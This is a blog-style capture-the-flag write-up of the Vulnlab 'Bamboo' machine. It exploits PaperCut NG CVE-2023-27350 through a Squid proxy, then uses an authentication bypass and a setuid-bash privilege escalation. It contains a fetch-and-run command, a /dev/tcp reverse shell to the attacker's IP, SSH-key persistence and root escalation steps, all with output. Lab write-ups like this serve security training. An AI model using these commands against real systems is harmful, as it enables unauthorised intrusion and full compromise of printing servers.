vulnlab-bamboo

vulnlab bamboo

nmap scan

# Nmap 7.93 scan initiated Wed Jul 31 08:34:44 2024 as: nmap -Pn -oN bamboo.nmap 10.10.79.83
Nmap scan report for bamboo.vl (10.10.79.83)
Host is up (0.020s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
3128/tcp open  squid-http

# Nmap done at Wed Jul 31 08:34:52 2024 -- 1 IP address (1 host up) scanned in 8.12 seconds

squidscan

┌──(puck㉿kali)-[~/vulnlab/bamboo/squidscan]
└─$ ./squidscan                     
Port 22 found!
8916 / 65535 [------->____________________________________________] 13.60% 1659 p/sPort 9192 found!
Port 9195 found!
Port 9173 found!
Port 9174 found!
9707 / 65535 [------->____________________________________________] 14.81% 1678 p/sPort 9191 found!
65532 / 65535 [---------------------------------------------------->] 100.00% 0 p/s

 

modified /etc/proxychains

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 	127.0.0.1 9050
#socks5 127.0.0.1 1080
http 10.10.79.83 3128

.

┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ curl --proxy http://10.10.79.83:3128 http://10.10.79.83:9191 -vv
*   Trying 10.10.79.83:3128...
* Connected to 10.10.79.83 (10.10.79.83) port 3128
> GET http://10.10.79.83:9191/ HTTP/1.1
> Host: 10.10.79.83:9191
> User-Agent: curl/8.8.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> 
* Request completely sent off
< HTTP/1.1 302 Found
< Date: Wed, 31 Jul 2024 06:40:17 GMT
< Location: http://10.10.79.83:9191/user
< Content-Length: 0
< X-Cache: MISS from bamboo
< X-Cache-Lookup: MISS from bamboo:3128
< Via: 1.1 bamboo (squid/5.2)
< Connection: keep-alive
< 
* Connection #0 to host 10.10.79.83 left intact

Exploiting CVE-2023-27350

wget https://raw.githubusercontent.com/horizon3ai/CVE-2023-27350/main/CVE-2023-27350.py

 

1st

┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ proxychains4 -q python3 CVE-2023-27350.py --url http://10.10.79.83:9191 --command "curl http://10.8.2.138/s.sh -o /tmp/s.sh"
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

2nd

┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ proxychains4 -q python3 CVE-2023-27350.py --url http://10.10.79.83:9191 --command "bash /tmp/s.sh" 
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

s.sh contains:

#!/bin/bash
sh -i >& /dev/tcp/10.8.2.138/9001 0>&1

 

catch the shell

┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ rlwrap nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.79.83] 57168
sh: 0: can't access tty; job control turned off
$ id
uid=1001(papercut) gid=1001(papercut) groups=1001(papercut)
$ hostname
bamboo

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
papercut@bamboo:~/server$ export TERM=xterm
export TERM=xterm
papercut@bamboo:~/server$ 
zsh: suspended  rlwrap nc -nlvp 9001
                                                                                                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ stty raw -echo;fg
[1]  + continued  rlwrap nc -nlvp 9001
papercut@bamboo:~/server$ ls
ls
bin     deployment   lib      reports                     server.uuid
custom  event-store  lib-ext  server.properties           tmp
data    examples     logs     server.properties.template  version.txt
papercut@bamboo:~/server$ 

Let’s add our key to the authorized_keys file, to get a SSH shell

papercut@bamboo:~$ mkdir .ssh
papercut@bamboo:~$ cd .ssh
papercut@bamboo:~/.ssh$ echo 'ssh-rsa AAAAC3N<redacted>QGB= puck@kali' > authorized_keys
papercut@bamboo:~/.ssh$

we now do linpeas and pspy stuff on bamboo

ssh -i papercut papercut@10.10.79.83

 

privesc

There is an authentication bypass script in exploitdb https://www.exploit-db.com/exploits/51391 which is the same CVE as the one we started
We run it as follows and it will output what we need to do.

➜  bamboo python3 auth_bypass.py
Enter the ip address: 127.0.0.1
Version: 22.0.6
Vulnerable version
Step 1 visit this url first in your browser: http://127.0.0.1:9191/app?service=page/SetupCompleted
Step 2 visit this url in your browser to bypass the login page : http://127.0.0.1:9191/app?service=page/Dashboard

The PaperCut NG instance running on port 9191 so let’s forward that port via SSH

papercut papercut@10.10.29.83 -L 9191:127.0.0.1:9191 -N

Browse to papercut

Click refresh servers to trigger the server-command

.

papercut@bamboo:~$ pwd
pwd
/home/papercut
papercut@bamboo:~$ cat user.txt
cat user.txt
VL{fb<redacted>c3}
papercut@bamboo:~$ 

papercut@bamboo:~/server/bin/linux-x64$ ls
ls
app-monitor                              pc-pdl-to-image
app-monitor.conf                         pc-split-scan
app-server                               pc-udp-redirect
authpam                                  roottasks
authsamba                                sambauserdir
create-client-config-file                server-command
create-ssl-keystore                      setperms
db-tools                                 start-server
direct-print-monitor-config-initializer  stduserdir
gather-ldap-settings                     stop-server
lib                                      upgrade-server-configuration
papercut@bamboo:~/server/bin/linux-x64$ echo 'chmod u+s /bin/bash' >> server-command

echo 'chmod u+s /bin/bash' >> server-command
papercut@bamboo:~/server/bin/linux-x64$ 
papercut@bamboo:~/server/bin/linux-x64$ ls -la /bin/bash
ls -la /bin/bash
-rwsr-xr-x 1 root root 1396520 Jan  6  2022 /bin/bash
papercut@bamboo:~/server/bin/linux-x64$ bash -p
bash -p
bash-5.1# cd /rocd /root
cd /root
bash-5.1# ls    ls
ls
root.txt  snap
bash-5.1# cat rocat root.txt
cat root.txt
VL{48<redacted>26}
bash-5.1# 

That’s all.

 

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *